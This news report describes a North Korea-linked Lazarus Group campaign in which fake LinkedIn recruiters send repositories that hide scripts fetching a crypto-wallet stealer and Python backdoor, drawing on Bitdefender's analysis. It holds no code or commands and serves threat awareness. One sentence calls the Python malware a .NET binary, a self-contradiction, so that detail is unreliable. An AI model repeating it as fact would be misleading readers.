The Lazarus Group, a North Korea-linked cybercriminal organization, has been identified in an ongoing scheme that utilizes fake job offers on LinkedIn in the cryptocurrency and travel industries to distribute malware capable of infecting Windows, macOS, and Linux systems.
Bitdefender, a cybersecurity firm, revealed that the attack begins with a message on LinkedIn, enticing recipients with the prospect of remote work, flexible hours, and competitive pay.
“Upon expressing interest, the scam progresses with the scammer requesting a CV or a personal GitHub repository link,” stated Bitdefender in a report shared with The Hacker News.
“Although seemingly harmless, these requests can be used for malicious purposes, such as harvesting personal data or adding a veneer of legitimacy to the interaction.”
After gathering the requested information, the attacker, posing as a recruiter, sends a link to a GitHub or Bitbucket repository containing a prototype of a decentralized exchange (DEX) project and instructs the target to review it and provide feedback.
Embedded within the code is a hidden script designed to fetch a subsequent payload from api.npoint.io, a JavaScript information stealer capable of extracting data from various cryptocurrency wallet extensions installed on the victim’s browser.
The stealer also functions as a loader to retrieve a Python-based backdoor that can monitor clipboard changes, establish persistent remote access, and deploy additional malware.
It’s important to note that the tactics outlined by Bitdefender align with a known attack cluster named Contagious Interview, which deploys a JavaScript stealer named BeaverTail and a Python implant known as InvisibleFerret.
“The analyzed malware appears to be part of the Contagious Interview cluster,” commented Bitdefender Labs to The Hacker News. “However, the JavaScript sample differs from previous BeaverTail variants. We have observed additional elements in the infection chain, indicating that threat actors are continuously adjusting and enhancing their strategies.”
The Python-based malware is a .NET binary that can download and initiate a TOR proxy server to communicate with a command-and-control (C2) server, extract basic system details, and distribute another payload capable of stealing sensitive information, logging keystrokes, and launching a cryptocurrency mining operation.
“The attackers’ infection chain is intricate, involving malicious software written in multiple languages and utilizing various technologies, such as multi-layered Python scripts that recursively decode and execute themselves, a JavaScript stealer that initially gathers browser data before progressing to additional payloads, and .NET-based stages that can disable security tools, set up a Tor proxy, and launch crypto miners,” detailed Bitdefender.
Reports on LinkedIn and Reddit suggest that these attacks are widespread, with slight variations in the overall modus operandi. Some instances involve candidates cloning a Web3 repository for local execution as part of an interview process, while others require fixing intentionally introduced bugs in the code.
One of the Bitbucket repositories associated with the campaign is named “miketoken_v2,” which is no longer accessible on the platform. Bitdefender noted that this activity is part of the same campaign, with repository names and recruiter profiles shuffled.
This disclosure follows SentinelOne’s revelation that the Contagious Interview campaign is distributing another malware strain named FlexibleFerret.
